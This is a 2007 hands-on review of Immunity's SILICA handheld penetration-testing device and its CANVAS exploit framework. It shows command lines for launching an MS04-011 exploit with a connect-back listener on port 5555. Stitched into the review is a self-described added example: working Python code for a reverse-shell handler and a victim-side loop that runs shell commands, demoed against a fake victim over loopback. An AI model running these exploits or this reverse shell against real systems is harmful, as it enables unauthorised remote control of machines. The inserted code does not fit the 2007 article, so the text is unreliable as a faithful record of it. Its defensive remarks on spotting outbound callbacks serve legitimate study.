
Penetration Testing with SILICA

Last updated Mar 23, 2007.

Imagine a device that, with the push of a button, automatically scans for wireless networks, connects to them, and then attacks each and every device on the network. Sound like something out of Hollywood? Well, the device is real, and for $3600 you too can own one — and then own everyone.

The device, formally known as the SILICA, was created by Immunity to assist penetration testers with their work. It officially hit the shelves in February 2007, but has been making headlines over the last year as Immunity demonstrated it at various conferences. Thankfully, White Wolf Security was gracious enough to let us borrow theirs and give it a whirl. Quite honestly, we were expecting to be a bit disappointed, because media hype is usually exaggerated. Not only were we dead wrong about that assumption, but we will go so far as to highly recommend this device to anyone interested in penetration testing from the palm of their hand.

If you are a bit concerned that anyone could buy one of these and use it irresponsibly, rest assured that Immunity is not selling this device to just anyone. First, you have to come up with $3600 just to get your foot in the door. Secondly, Immunity says it checks that the buyer is legitimate and that the money was not stolen. Finally, the SILICA has to be updated periodically to keep it current with the latest exploits and to fix the bugs that tend to afflict new products. During this update process Immunity verifies that the device is licensed, and could very easily remove its application from a device that has been used maliciously.

The SILICA has two main user groups. The first is the penetration tester or auditor who wants to perform a covert scan of a target's business. This type of user simply gets within close proximity of the site they want to test, hits the scan button, hangs out for a few minutes while the SILICA does its job, and then reviews the report to help determine further actions. Typically, the SILICA will be used in this case to perform quick in-and-out audits, which is exactly what it was designed to do.

However, the SILICA can be much more than just a basic scan and attack device. Contained within its small form factor is the very powerful and customizable CANVAS penetration testing platform/framework from Immunity. With this in hand, quite literally, a penetration tester can do much more than simply scan a network for vulnerabilities. For example, they could program the device to download files from any unprotected shares, install backdoors, create user accounts on vulnerable systems, and much more. It is really up to the imagination of the owner as to the limits of the attack.

As mentioned earlier, the core component of the SILICA is the CANVAS penetration testing engine from Immunity. This framework allows penetration testers to quickly and easily locate vulnerable computers and then "hack" them. Currently, there are over 150 different exploits within the tool that can be used to attack anything that connects to a network, from operating system to application. The beauty of using CANVAS in the SILICA is that the user gets all the flexibility it offers. Since CANVAS is really nothing more than a large collection of cleverly organized and programmed Python scripts, a penetration tester can easily modify or create their own scripts to turn the SILICA into a customized attack tool.

There are two main ways to interact with the guts of the SILICA. The first is via the included X Terminal program, which drops you to the all-powerful shell. You then type sudo gainroot, which gives you root-level access to everything on the device. While this method does work, it is rather tedious to type commands into the device using the on-screen keyboard. So, the SILICA also contains a fully functional SSH server that can be accessed using the root account. Before attempting this you will need a root password, which you can set with the passwd program once you have used the gainroot method to become root. Pick a strong one: a pocket device that carries 150-odd working exploits and spends its days attached to untrusted wireless networks is the last thing you want falling to an SSH brute-force attempt.

So, let's get cracking. In this first example, we are going to let our device scan the network in easy mode. To do this, we just turn on the device and go to Programs, Extras, SILICA from the menu (Figure 1). Next we simply hit the Scan button on the easy-to-use interface (Figure 2) and the SILICA does the rest. Figures 3 and 4 show what it looks like as the SILICA scans the network. By default, if a system is found to be vulnerable, the SILICA will exploit the vulnerability and take a screenshot of the computer, which it then displays in the final HTML report.

Figure 1: Executing SILICA

Figure 2: Initiating the Scan

Figure 3: SILICA in Action

Figure 4: SILICA in More Action

While this method of attacking is rather neat, we wanted to see what else we could do with the SILICA. So, we opened up the shell and started to poke around manually. There are really two main scripts used by the device, and both can be executed manually from the shell.

./exploits/VulnAssess/VulnAssess.py performs a vulnerability assessment against a selected target, and ./exploits/massattack/massattack.py attempts to attack the system and find a way in. Both are handy ways to test a single system, which is one thing the Scan button does not yet let you do.

However, since CANVAS is designed to be modular, you can also manually attack a system and gain shell access to it, or more. We decided to try out the manual approach against a known vulnerable system. So, we found our way over to the ./exploits/ms04_011 folder (MS04-011 is the April 2004 Microsoft bulletin covering, among other things, the LSASS overflow that the Sasser worm went on to exploit) and reviewed the script. As with most of the exploit scripts, this one can be launched by itself. Each file carries instructions on how to use the script, and in this case those instructions were:

./exploits/ms04_011/ms04_011.py -v 0 -t <targetIP> -l <listenerIP> -d 5555
./commandlineInterface.py -v 1 -p 5555 -i fromcreatethread

Between them, these two commands open a listener on port 5555 on the SILICA (the -l and -d arguments name the listener's address and port), fire the exploit at <targetIP> with shellcode that has been told to connect back to that listener, and then hand you a command line on the "hacked" box once the connection arrives. Note the direction of the connection: it runs from the victim out to the SILICA, not the other way around, which is what gets the shell past a host firewall that only blocks inbound traffic, and also what a defender watching the wire should be looking for. The following screenshots detail the attack.

Figure 5: CANVAS creating the exploit

Figure 6: Attacking the vulnerable system

Figure 7: System OWNED
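The callback mechanism behind those two commands, as an added example that is not CANVAS or SILICA code: a minimal connect-back ("reverse") shell handler, which is the attacker side that listens on a port, paired with the second-stage loop a payload runs on the victim once the exploit lands. Both ends run here over loopback against a constructed fake victim that answers a couple of canned commands, so it works offline. The framing (newline-terminated commands one way, length-prefixed output the other), the class and function names, and the port choice are this example's own assumptions; real shellcode usually just hands the socket straight to cmd.exe.

```python
import socket
import subprocess
import threading

# Constructed example of a connect-back shell channel. Not CANVAS/SILICA
# code; the framing protocol (newline-terminated commands to the victim,
# 4-byte length-prefixed output back) is an assumption made here so that
# multi-line output survives intact.


class ConnectBackHandler:
    """Attacker side: bind a port, wait for the payload to call home, then
    drive it one command at a time."""

    def __init__(self, host="127.0.0.1", port=0):
        # port=0 lets the OS pick a free port; a real handler would use 5555
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.conn = None

    def wait_for_callback(self, timeout=5.0):
        """Block until the victim connects; return (ip, port) of the caller.
        The victim initiates the TCP connection, which is why a reverse
        shell passes host firewalls that only block inbound connections."""
        self.sock.settimeout(timeout)
        self.conn, peer = self.sock.accept()
        self.conn.settimeout(timeout)
        return peer

    def run(self, command):
        """Send one command line and return the payload's output."""
        self.conn.sendall(command.encode() + b"\n")
        return recv_frame(self.conn)

    def close(self):
        try:
            self.conn.sendall(b"exit\n")
        finally:
            self.conn.close()
            self.sock.close()


def recv_exact(conn, n):
    """Read exactly n bytes or raise if the channel goes away."""
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("callback channel closed")
        buf += chunk
    return buf


def recv_frame(conn):
    """Read a 4-byte big-endian length, then that many bytes of output."""
    n = int.from_bytes(recv_exact(conn, 4), "big")
    return recv_exact(conn, n).decode(errors="replace")


def execute_locally(command):
    """What a real second stage does: run the command in the local shell."""
    done = subprocess.run(command, shell=True, capture_output=True, text=True)
    return done.stdout + done.stderr


def connect_back(host, port, run_command=execute_locally):
    """Victim side: connect out to the handler, then loop reading a
    command, executing it, and sending back the framed output."""
    s = socket.create_connection((host, port))
    reader = s.makefile("rb")
    try:
        while True:
            line = reader.readline()
            if not line:
                break
            command = line.decode().strip()
            if command == "exit":
                break
            out = run_command(command).encode()
            s.sendall(len(out).to_bytes(4, "big") + out)
    finally:
        s.close()


def demo():
    """Run both ends over loopback with a constructed fake victim that
    answers two commands, so the whole exchange works offline."""
    canned = {  # constructed responses standing in for a Windows box
        "whoami": "nt authority\\system\r\n",
        "hostname": "victim-xp\r\n",
    }

    def fake_victim(command):
        return canned.get(command, f"'{command}' is not recognized.\r\n")

    handler = ConnectBackHandler()
    victim = threading.Thread(target=connect_back,
                              args=("127.0.0.1", handler.port, fake_victim),
                              daemon=True)
    victim.start()
    handler.wait_for_callback()
    results = [handler.run(c) for c in ("whoami", "hostname", "ipconfig")]
    handler.close()
    victim.join(timeout=5.0)
    return results


if __name__ == "__main__":
    for line in demo():
        print(line, end="")
```

From the defender's side the only artifact of this exchange is an outbound TCP connection from the victim to an unusual high port on a host that just appeared on the wireless network, followed by a trickle of short request/response traffic; that, rather than any inbound scan, is the thing to alert on.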

Obviously there is a lot this little device can do. We should also point out that the SILICA is actually a Nokia N800, which runs a stripped-down version of Debian Linux. It is no surprise that there are many, many people out there programming or porting hundreds of applications for the N800, some of which are very cool. For example, you can install Metasploit (another penetration testing platform), Kismet, Aircrack-ng, and even entertainment programs like mplayer. Simply put, the SILICA can be your personal entertainment toy when at home and your attack system while at work.

If you are a security expert, work for a three-letter agency, or can otherwise justify the price, then you will want to consider one of these little devices.

We would especially like to thank White Wolf Security for allowing us to borrow this device and Immunity for answering all of our questions. As most know, good support can make the difference between a frustrated user and a happy one, and Immunity was very quick in helping us out.

White Wolf Security is a provider of high-end, tailored, hands-on information security training and exercises. They are unique because their courses move beyond the technology. Their diverse team of instructors is drawn from a variety of backgrounds. As a result, they are able to address the technical, legal, policy and national security issues that surround information and its uses, and to meet the needs of customers ranging from the corporate world to members of DoD and Federal law enforcement.

To provide an optimal training environment, White Wolf operates a full-time learning facility in Lancaster, PA known simply as "The Center." The Center is more than a classroom. In it, they provide a variety of equipment, network infrastructure and technology in a working, live environment. In this fashion, students learn through lecture, hands-on work, and other dynamic means including live investigations and war-gaming. This provides true application-based learning.
